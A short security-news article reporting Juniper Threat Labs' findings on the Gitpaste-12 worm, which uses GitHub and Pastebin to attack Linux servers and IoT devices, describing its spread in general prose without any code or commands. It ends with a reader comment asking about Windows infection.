Gitpaste-12 malware is targetting you through GitHub
- Linux based x86 servers and Linux ARM/MIPS based IoT devices may turn into a Gitpaste-12 target.
- Gitpaste-12 is a new worm that uses GitHub and Pastebin. Take a look below to find more about it.
- To easily get rid of malware and other threats, use the tips described in our Removal Guides section.
- Moreover, bookmarking this Security & Privacy Software Hub could be a smart choice for the future.
Gitpaste-12 is a recently discovered worm that uses GitHub and Pastebin for housing component codes and exploiting over 12 vulnerabilities.
Therefore, this malware is known as Gitpaste-12 because of the usage of GitHub and Pastebin, also having at least 12 different attack modules.
At the moment, targets include Linux based x86 servers, along with Linux ARM and MIPS based IoT devices.
The first GitPaste-12 first attacks were detected by Juniper Threat Labs. The report released by Juniper Threat Labs reveals:
The first phase of the attack is the initial system compromise. (…) This worm has 12 known attack modules and more under development.
How does Gitpaste-12 spread?
After this initial phase, the worm seems to have a precise mission: it identifies known exploits and may attempt to brute force passwords.
When a system is compromised, Gitpaste-12 sets up a cron job it downloads from Pastebin, which executes the same script again each minute.
This efficient mechanism is most likely used to push cron jobs updates to the botnet. As already confirmed, the Gitpaste-12 malware also contains a script that launches attacks against other machines.
It’s the way this worm tries to replicate, starting with random /8 CIDR attacks over all addresses within its range.
Knowing the Gitpaste-12 location and the fact that it can spread that easily, are you about to keep on using GitHub? Let us know your thoughts on this in the comments area below.
0 comments
Have we seen this worm compromise Windows machines? How would I know if it’s on my machine?
Thanks!